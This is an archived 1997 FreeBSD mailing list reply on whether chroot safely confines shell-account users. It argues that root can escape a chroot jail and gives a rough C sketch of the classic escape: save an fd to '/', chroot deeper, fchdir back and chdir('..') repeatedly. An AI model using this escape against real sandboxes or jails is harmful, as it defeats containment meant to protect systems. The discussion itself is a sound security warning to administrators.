Date: Thu, 29 May 1997 09:16:10 -0600 From: Warner Losh <imp@village.org> To: Terry Lambert <terry@lambert.org> Cc: dec@phoenix.its.rpi.edu, peter@grendel.IAEhv.nl, mrcpu@cdsnet.net, hackers@freebsd.org Subject: Re: Correct way to chroot for shell account users? Message-ID: <E0wX6vy-0002fp-00@rover.village.org> In-Reply-To: Your message of "Thu, 29 May 1997 07:56:26 PDT." <199705291456.HAA03526@phaeton.artisoft.com> References: <199705291456.HAA03526@phaeton.artisoft.com>
next in thread | previous in thread | raw e-mail | index | archive | help
In message <199705291456.HAA03526@phaeton.artisoft.com> Terry Lambert writes:
: 1) namei() refusing to traverse ".." from the chroot'ed
: root vnode (this is broken, but then almost all of
: namei() is broken, and no one cares but me...).
This works because the .. is outside the jail.
: 2) The chroot() call takes a path, which namei() will
: look up relative
Yes. That's true but irrelevant.
: 3) The link() system call in /sys/kern/vfs_syscalls.c has
: code to prevent hard links on directories:
:
: if (vp->v_type == VDIR)
: error = EPERM; /* POSIX */
:
: Not even root can do the hard link your method requires.
Right, that's what I said, but this is new.
: 4) You don't have to let them have an open fd to the original
: "/" when you throw them in jail.
Ummm, the "/" I was talking about was the new root (eg /jail in the
non-chroot'd system). You open up /, keep that fd around, then chroot
to someplace else lower in your current tree (eg /jail/xxx in the
non-chrooted case, or /xxx in the chroot'd case). At this point the
fchdir would succeed in landing you outside the jail.
: 5) Calling chroot(2) is restricted to the superuser anyway,
: and only an idiot would try to put a root user in a
: chroot jail anyway (or put an ordinary user in a chroot
: jail with suid/sgid binaries).
100% correct. However, many people think that a chroot'd environment
is so safe that even root can't climb out. It isn't. If somehow a
user gets root in a chroot'd environment, then your entire machine can
be comporomised.
Michael Smith posted the program to climb out of the jail here a few
months ago. This isn't theoretical, but it works. It was something
along the lines of the following. You can find it in the archives.
int main()
{
int fd;
mkdir("xxx");
fd = open("/");
chroot("/xxx");
fchdir(fd);
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
}
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?E0wX6vy-0002fp-00>